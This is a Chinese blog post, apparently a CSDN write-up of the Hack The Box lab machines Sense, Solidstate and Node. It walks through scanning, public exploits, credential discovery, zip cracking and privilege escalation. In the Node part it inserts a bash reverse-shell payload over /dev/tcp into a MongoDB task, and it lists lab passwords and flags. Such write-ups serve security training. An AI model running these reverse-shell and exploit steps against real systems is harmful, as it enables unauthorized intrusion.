HTB-oscplike-sense+solidstate+node

最新推荐文章于 2024-06-16 13:15:43 发布
最新推荐文章于 2024-06-16 13:15:43 发布
阅读量1.7k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123859384
版权

HTB-oscplike-sense+solidstate+node

Sense

easy难度的sense 靶机IP 10.10.10.60
nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.60
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
443/tcp open ssl/http lighttpd 1.4.35

dirsearch看到changelog.txt 和system-users.txt 后者里有
username: Rohit
password: company defaults
结合searchsploit的结果这网站是pfsense 以这个为密码登录 进入后台

进去后看到版本2.1.3 searchsploit找到exp cve-2014-4688执行弹回shell
然后我看了看提权发现我是root… 直接拿flag就行
8721327cc232073b40d27d9c17e7348b
d08c32a5d4f8c8b10e76eb51a69f1a86
请添加图片描述

Solidstate

meduim难度的solidstate 靶机IP 10.10.10.51

22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
80/tcp open http Apache httpd 2.4.25 ((Debian))
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
5355/tcp filtered llmnr

dirsearch wfuzz看了一圈没啥东西 searchsploit james 2.3.2 找到漏洞 能进去修改邮件用户的密码
然后telnet连Pop3上去看邮件 看到mindy用户下有一封邮件有
username: mindy
pass: P@55W0rd1!2@

能不能ssh连进去呢 是可以的 进去拿到user的flag
0510e71c2e8c9cb333b36a38080d0dc2
提权看了半天传了个pspy发现在执行/opt/tmp.py
修改py弹回root shell即可 拿到root flag
4f4afb55463c3bc79ab1e906b074953d

Node

medium难度的node 靶机IP 10.10.10.58

sudo nmap -sS -sV -A -p- -Pn --min-rate=5000 10.10.10.58
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open hadoop-datanode Apache Hadoop

3000网页上有登录但是啥也试不出来 后台文件什么的也扫不出来 于是联想到题目node 估计就是nodejs
于是在js里瞎勾八翻 最后找到
请添加图片描述

md5解密管理员密码是manchester进去之后可以下载一个backup文件
但是这个文件不知道咋打开 file backup发现是一大段ascii text
但是strings backup发现很像是一个base64 base64解码之后变成了一个zip 可以解压且解压需要密码

用john爆破 zip2john tmp然后把里面要用的内容放到新文件a里
john a --wordlist=/home/kali/Desktop/rockyou.txt --format=PKZIP 密码是magicword
进去之后在app.js里看到
请添加图片描述

结合我们之前翻到的一个用户名是mark ssh直接可以连上去

上去发现没有权限拿tom目录下的flag 这里提权一个是可以直接pkexec提权 但是这么做属于纯纯作弊
正常情况首先我们要提到tom权限 linpeas发现tom会执行 /var/scheduler/app.js 而这个js里存在命令执行

请添加图片描述
这里我们直接mongo -u mark -p 5AYRft73VtFpc84k scheduler连进去
db.tasks.insert({“cmd”:"/bin/bash -c ‘bash -i >& /dev/tcp/ip/port 0>&1’"})赋值我们的payload

然后就静待执行就弹回了tom的shell拿到user的flag e1156acc3574e04b06908ecf76be91b1

然后在find / -perm -u=s -type f 2>/dev/null可以看到有个奇怪的backup文件
这时候回到我们的app.js可以看到里面是标注了backup的使用方法和密钥的 我们照搬一下

/usr/local/bin/backup -p 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root/root.txt

执行发现返回了一串加密过的字符串 base64解码之后是一个zip文件 进去又是要密码的
用之前的密码magicword就可以打开 但是里面它马的是一个笑脸
请添加图片描述
那么就来分析文件吧 nc -lvnp 7888 >backup nc 10.10.14.19 7888 <backup 文件传过来

分析之后发现考点是缓冲区溢出 但是有一个其他的点可以绕过 /root会触发笑脸 换成/r**t就行了…拿到flag
1722e99ca5f353b362556a62bd5e6be0
缓冲区溢出的话分析起来有点费劲 不打字了 寄!
请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3069
每台都做一做,然后记录在博客里.供自己和大家一起学习.
HTB-oscplike-Fuse+Intelligence
m0_53302733的博客
04-21 3921
HTB-oscplike-Fuse+Intelligence Fuse 除开忙了几天耽误了一段时间 这个月二十多天加上没记录的打了五十多台机器了 htb会员也马上到期了 这两天找几台AD域的打打 回头就打oscp里的机器了 medium难度的fuse 靶机IP 10.10.10.193 sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.193 53/tcp open domain Simple DNS Plus 80/tcp
oscplike:Kioptix Level 1渗透笔记
fmyyy1的博客
05-31 286
因为靶机都是在内网的,省时间写了个bash脚本利用ping命令快速探测存活主机。不过一般都是用nmap #!/bin/bash if [ $1 == ""] then echo "Usage: ./pingsweep.sh [network]" echo "Example: ./pingsweep.sh 192.168.1" else for ip in `seq 1 254`; do ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | sed
一文带你了解OSCP 2024
最新发布
白帽黑客佳哥的博客
06-16 1841
我们先说说,OSCP 是什么?OSCP (Offensive Security Certified Professional)是 Offensive Security (该公司开发和维护着 KALI Linux,以下简称 Offsec)推出的体系非常完善,对于非3年以上渗透工作经验人员来说难度非常高,理论兼实操(更重实操),是业界最知名的渗透测试专业证书。如果大家对网络、主机渗透、红队感兴趣的,这是大家的第一步。考试有三台单独考试靶机和一套域环境(三台机器)三台单独机器,每台20分;
HTB-oscplike-Object
m0_53302733的博客
04-21 3179
HTB-oscplike-Object hard难度的object 靶机IP 10.10.11.132 也不知道是这个靶机出的晚刚加上还是很多人oscplike机器打不到这最后一台 这台总共就一百来个人通了 sudo nmap -sC -sV -A -p- --min-rate=1000 -Pn 10.10.11.132 80/tcp open http Microsoft IIS httpd 10.0 5985/tcp open http Microsoft HTTPAPI httpd
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
HTB-oscplike-Forest
m0_53302733的博客
04-10 2512
HTB-oscplike-Forest easy难度的forest 靶机IP 10.10.10.161 sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.161 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-09 10:45:13Z) 135/tcp
HTB-SolidState
qq_42488061的博客
08-29 1019
HTB-SolidState
HTB靶机011-Node-WP
灰蜗牛
05-12 1692
HTB靶机011-Node-WP,这题比较复杂,最后提权是难点
HTB靶场系列 linux靶机 Node靶机
m0_57221101的博客
01-13 1741
勘探 nmap > nmap 10.10.10.58 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 10:58 EDT Nmap scan report for 10.10.10.58 Host is up (0.31s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 22/tcp open ssh 3000/tcp open ppp Nmap
oscp学习计划二期
菜浪马废的博客
04-29 1258
一期 只有一点点基础知识的我 看着Google和vulnhub 一边刷练习 一边看笔记 慢慢也有了自己的知识框架 但是还是感觉准备的不充分 笔记 之前就拿CSDN做笔记了 每篇博客都很少有文字 大多都是我的操作截图 不是特别正规 为了备战 明天开始用官方的报告来写 但是他是五个一组 就是在一个文件中 要对五个靶机进行描述 希望我可以一天打五个靶机吧(现在一天最多3) 报告模板已经给了链接 有需要的...
HTB-Sense
qq_42488061的博客
08-28 937
HTB-Sense
HTB-oscplike-Bastian+Secnotes
m0_53302733的博客
04-12 2326
HTB-oscplike-Bastian+Secnotes Bastian easy难度的bastion 靶机IP 10.10.10.134 sudo nmap -sC -sV -p- --min-rate=1000 -Pn 10.10.10.134 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc? 139/tcp open netbios-ssn? 445/tcp
htb-sense
m0_55772907的博客
09-20 196
htb
cozyhosting+htb
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作才能解决这个挑战。具体的解题步骤我无法提供,因为每个挑战都设计得非常独特,需要你自己进行思考和尝试。 如果你对Hack The Box平台或CozyHosting有进一步的问题,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值